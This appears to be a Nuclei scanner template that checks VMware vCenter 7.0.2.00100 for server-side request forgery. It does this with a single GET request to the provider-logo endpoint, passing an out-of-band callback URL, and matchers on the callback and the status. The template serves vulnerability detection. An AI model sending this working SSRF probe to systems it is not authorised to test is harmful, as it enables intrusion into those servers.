id: vmware-vcenter-ssrf

info:
  name: VMware vCenter - Server-Side Request Forgery/Local File Inclusion/Cross-Site Scripting
  author: pdteam
  severity: critical
  description: VMware vCenter 7.0.2.00100 is susceptible to multiple vulnerabilities including server-side request forgery, local file inclusion, and cross-site scripting.
  reference:
    - https://github.com/l0ggg/VMware_vCenter
  tags: ssrf,lfi,xss,oast,vcenter,vmware

requests:
  - method: GET
    path:
      - "{{BaseURL}}/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=https://{{interactsh-url}}"

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/05/31
